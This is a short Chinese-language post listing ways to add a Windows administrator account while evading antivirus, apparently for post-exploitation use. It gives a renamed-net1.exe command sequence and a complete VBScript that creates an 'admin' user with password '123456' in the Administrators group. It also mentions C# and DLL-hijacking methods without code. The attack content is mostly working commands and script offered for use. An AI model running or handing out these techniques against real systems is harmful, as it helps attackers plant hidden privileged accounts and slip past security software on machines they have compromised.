windows绕过杀软添加账户密码

起因：system权限下存在杀软无法添加账户信息

绕过方法

1、C#脚本

运行后会在目标机器上创建一个用户为 wh4am1 密码为 qqai@love 的 Administrators 组用户

2、Dll劫持

3、copy net1(被拦截)

cd C:\Windows\System32
copy net1.exe xxx.exe
xxx.exe user administrator test test /add

我在先知社区看见一位表哥使用该方法绕过了360，不知道为什么不行了，大家也可以自己尝试下！

https://xz.aliyun.com/t/8083

4、add.vbs脚本

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","admin")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

用法：wscript.exe add.vbs

参考

https://cloud.tencent.com/developer/article/1669051

http://blog.icxun.cn/wap/view.php?aid=577